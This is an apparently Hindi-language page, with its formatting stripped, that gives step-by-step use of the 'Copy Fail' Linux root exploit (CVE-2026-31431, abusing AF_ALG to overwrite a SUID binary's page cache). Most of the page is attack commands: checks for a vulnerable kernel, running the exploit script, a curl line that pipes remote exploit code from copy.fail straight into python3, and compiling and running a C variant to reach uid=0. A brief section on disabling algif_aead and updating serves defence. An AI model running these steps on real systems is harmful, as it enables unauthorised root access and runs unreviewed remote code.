
अधिकांश Linux LPE को रेस विंडो या कर्नेल-विशिष्ट ऑफसेट की आवश्यकता होती है। Copy Fail एक सीधी-रेखा तर्क दोष है, इसे इनमें से किसी की भी आवश्यकता नहीं होती। वही 732-बाइट Python स्क्रिप्ट (या .c elf) 2017 के बाद से जारी हर Linux डिस्ट्रीब्यूशन को रूट कर देती है।
यह सामग्री केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। बिना स्पष्ट अनुमति के इसे किसी सिस्टम पर न चलाएं।
कॉपी फेल (CVE-2026-31431) एक Linux लोकल प्रिविलेज एस्केलेशन (LPE) भेद्यता है जो AF_ALG के माध्यम से कर्नेल क्रिप्टो API को प्रभावित करती है।
यह एक अनप्रिविलेज्ड उपयोगकर्ता को SUID बाइनरी (जैसे, /usr/bin/su) के पेज कैश डेटा को ओवरराइट करने और रूट एक्सेस प्राप्त करने की अनुमति देती है।
AF_ALG सक्षमalgif_aead मॉड्यूल लोडेडos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
अपेक्षित संकेतक:
authencesn(hmac(sha256),cbc(aes))algif_aead लोडेडpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
अपेक्षित परिणाम:
uid=0(root)
os.splice not foundकारण:
समाधान:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
संभावित कारण:
आवश्यक टूल इंस्टॉल करें:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
अपने सिस्टम को अपडेट करें:
apt update && apt upgrade
यदि एक्सप्लॉइट विफल हो जाता है, तो विचार करें:
इस एक्सप्लॉइट का उपयोग केवल लैब्स, CTFs और अधिकृत पेंटेस्ट में जिम्मेदारी से करें।